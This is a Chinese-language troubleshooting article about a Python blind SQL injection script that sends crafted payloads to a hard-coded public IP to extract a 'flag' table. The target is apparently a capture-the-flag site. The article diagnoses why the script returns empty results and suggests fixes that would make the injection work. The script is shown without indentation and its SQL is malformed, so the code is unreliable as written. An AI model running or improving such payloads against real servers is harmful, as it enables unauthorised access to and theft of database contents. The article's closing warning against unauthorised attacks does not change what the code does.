SQL注入攻击导致空结果的原因及解决方法
本文分析一段Python代码,该代码尝试进行SQL注入攻击,但结果却为空。我们将探讨导致空结果的原因,并提出相应的解决方法。
问题代码及结果
以下Python代码尝试通过SQL注入获取数据:
import requests
import binascii
url = "http://110.41.8.154/"
def join(arr):
return ",".join([f"0x{binascii.hexlify(i.encode()).decode()}" if i != "" else "0x0" for i in arr])
result = ["","","","","",""] #长度为列数,包含一条随机数列
result_i = 0
for i in range(1, 3000):
min_value =32
max_value = 130
last_tmp = ""
for j in range(min_value, max_value + 1):
tmp = result[result_i]
result[result_i] = tmp + chr(j)
payload = {
"id": f"740-(({join(result)})>(select * from(select *, floor(1+rand(5)*500000))`xxx`from(flag))`t`where(xxx=221556)))"
}
html = requests.get(url, params=payload)
if "pk" not in html.text:
if j == min_value + 1:
result[result_i] = tmp
result_i += 1
else:
result[result_i] = last_tmp
break
else:
result[result_i] = tmp
last_tmp = tmp + chr(j)
#找不到目标主机
if (result_i == len(result) - 1):
break
print(result)
print("final flag",result)
运行结果:
['', '', '', '', '', ''] ['', '', '', '', '', ''] ... (repeated many times)
所有结果均为空。
原因分析
代码尝试利用盲注技术进行SQL注入。空结果可能由以下原因造成:
-
错误的Payload构造:
join函数将结果转换为十六进制,但SQL语句的构造过于复杂,可能存在语法错误或与目标数据库不兼容。select * from (select *, floor(1+rand(5)*500000))xxx from (flag)t where (xxx=221556)这部分SQL语句本身就存在问题,xxx的用法不规范,flag表和t表的含义不明确。 -
不准确的响应判断: 代码仅检查响应中是否包含
"pk"字符串。如果服务器返回的错误信息不包含"pk",或者服务器响应方式与预期不同,代码将无法正确判断注入是否成功。 -
字符集限制: 循环遍历的ASCII码范围(32-130)可能过于狭窄,目标数据库中可能包含不在此范围内的字符,导致无法完整提取数据。
-
目标服务器防护: 目标服务器可能已经采取了SQL注入防护措施,例如参数化查询或输入过滤,阻止了攻击的成功。
解决方法
-
简化Payload: 重写SQL注入语句,使用更简洁、更标准的SQL语法。例如,尝试使用基于布尔盲注的更简单的语句,逐步获取数据。
-
改进响应判断: 不要依赖单一的字符串
"pk"进行判断。 可以尝试根据服务器响应的HTTP状态码、响应长度或其他特征来判断注入是否成功。 更稳妥的方法是使用错误信息中包含的特定关键词进行判断。 -
扩展字符集: 扩大字符集范围,例如包含更多特殊字符或非ASCII字符。
-
添加错误处理和日志: 添加
try...except块来捕获异常,并记录每次请求的payload、服务器响应和错误信息,以便调试。 -
了解目标数据库: 了解目标数据库的结构和数据类型,这对于构造有效的SQL注入语句至关重要。
总而言之,解决这个问题需要仔细检查SQL语句的语法、服务器的响应机制,并采取更健壮的错误处理和日志记录策略。 盲注攻击本身就比较复杂,需要对目标系统有充分的了解,并且需要进行大量的尝试和调整。 请勿在未经授权的情况下进行任何SQL注入攻击。
